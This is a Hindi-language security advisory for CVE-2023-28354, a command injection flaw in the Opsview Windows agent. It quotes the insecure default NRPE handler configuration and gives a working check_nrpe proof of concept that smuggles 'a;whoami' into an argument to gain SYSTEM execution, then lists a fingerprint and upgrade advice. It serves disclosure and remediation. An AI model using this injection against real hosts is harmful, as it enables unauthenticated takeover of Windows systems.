
CVE-2023-28354
Opsview Monitor Agent 6.8 में एक भेद्यता पाई गई है जो एक अप्रमाणित दूरस्थ हमलावर को मनमाने कमांड निष्पादित करने की अनुमति देती है। विंडोज पर एक अप्रमाणित हमलावर डिफ़ॉल्ट Opsview Agent Monitor स्क्रिप्ट को कॉल करते समय कमांड-लाइन एस्केप अनुक्रम प्रदान करके इस भेद्यता का शोषण कर सकता है, जिससे मनमाने सिस्टम कमांड का निष्पादन संभव हो जाता है।
विंडोज पर Opsview Agent सेवा डिफ़ॉल्ट रूप से Local System के रूप में चलती है। इस डिफ़ॉल्ट कॉन्फ़िगरेशन में कई NRPE हैंडलर भी शामिल होते हैं, जो प्रशासकों को सिस्टम स्थिति, फ़ाइल आयु या माउंटपॉइंट्स की जाँच करने जैसे पूर्वनिर्धारित कार्यों को निष्पादित करने वाली स्क्रिप्ट को कॉल करने की अनुमति देते हैं। ये हैंडलर आर्गुमेंट्स स्वीकार करने (allow_arguments=1) और कमांड-लाइन एस्केप कैरेक्टर्स (allow_nasty_meta_characters=1) के लिए कॉन्फ़िगर किए गए हैं।
प्रभावित संस्करण में NRPE हैंडलर असुरक्षित रूप से कॉन्फ़िगर किए गए हैं, जो किसी दूरस्थ उपयोगकर्ता द्वारा सीधे PowerShell में स्क्रिप्ट कॉल करने पर कमांड इनपुट और किसी भी आर्गुमेंट को प्रतिध्वनित करते हैं।
एक डिफ़ॉल्ट opsview.ini कॉन्फ़िगरेशन फ़ाइल:
75: [External Script]
76: ;# COMMAND ARGUMENT PROCESSING
77: ; This option determines whether or not the NRPE daemon will allow clients to specify arguments to commands that are executed.
78: allow_arguments=1
79:
80: ;# COMMAND ALLOW NASTY META CHARS
81: ; This option determines whether or not the NRPE daemon will allow clients to specify nasty (as in |`&><'"\[]{}) characters in arguments.
82: allow_nasty_meta_chars=1
[...]snip[...]
94: [NRPE Handlers]
95: check_mountpoint=cmd /c echo scripts\check_mountpoint.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
96: check_services_orig=cmd /c echo scripts\check_services.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
97: check_services=scripts\check_services.exe $ARG1$
98: check_clustergroup=cmd /c echo scripts\check_clustergroup.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
99: check_windows_base_orig=cmd /c echo scripts\check_windows_base.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
100: check_windows_base=scripts\check_windows_base.exe $ARG1$
101: check_msmq=cmd /c echo scripts\check_msmq.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
102: check_ms_iis=cmd /c echo scripts\check_ms_iis.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
103: check_ms_dns=cmd /c echo scripts\check_ms_dns.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
104: check_ms_sql_database_states=cmd /c echo scripts\check_ms_sql_database_states.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
105: check_ms_sql_performance=cmd /c echo scripts\check_ms_sql_performance.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
106: check_ms_sql_system=cmd /c echo scripts\check_ms_sql_system.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
107: check_ms_hyperv_server=cmd /c echo scripts\check_ms_hyperv_server.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
108: check_microsoft_exchange2016_backpressure=cmd /c echo scripts\check_microsoft_exchange2016_backpressure.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
109: check_microsoft_exchange2013_backpressure=cmd /c echo scripts\check_microsoft_exchange2013_backpressure.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
110: check_microsoft_exchange_counters=cmd /c echo scripts\check_microsoft_exchange_counters.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
111: check_microsoft_exchange=cmd /c echo scripts\check_microsoft_exchange.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
112: check_active_directory=cmd /c echo scripts\check_active_directory.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
113: check_windows_updates=cmd /c echo scripts\check_windows_updates.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
114: check_file_age=cmd /c echo scripts\checkfileage.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
115: check_counter=cmd /c echo scripts\check_counter.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
116: check_xen=cmd /c echo scripts\check_xen.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
117: check_horizon=cmd /c echo scripts\check_horizon.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
118: check_xencloud=cmd /c echo scripts\check_xencloud.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
119: check_wineventlog=cmd /c echo scripts\check_wineventlogn.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
लिनक्स से डिफ़ॉल्ट इंस्टॉलेशन पर हमला करने के लिए, किसी ज्ञात-हैंडलर से संवाद करने के लिए Nagios check_nrpe उपयोगिता का उपयोग किया जा सकता है, जो आर्गुमेंट के रूप में एक कमांड-लाइन एस्केप और वांछित कमांड को दूरस्थ रूप से चलाने के लिए प्रदान करता है।
उदाहरण के लिए:
$ /usr/lib/nagios/plugins/check_nrpe -H 192.168.0.15 -c check_file_age -a "a;whoami"
CRITICAL: File a does not exist
nt authority\system
Screencast from 2025-04-10 10-52-02.webm
Opsview Windows Agent 28-09-2022, और x64 तथा Win32 रिलीज़।
भेद्य उत्पाद के लिए दूरस्थ फ़िंगरप्रिंट:
OpsviewAgent 0.3.9.700 2022-09-28; osname=windows
Opsview Windows Agent 09-03-2023 रिलीज़ में अपग्रेड करें।
नोट: ITRS के सूचना के अनुसार Opsview Agent को आगे कोई अपडेट प्राप्त नहीं होगा। इसके बजाय ITRS Infrastructure Agent में अपग्रेड करने की अनुशंसा की जाती है।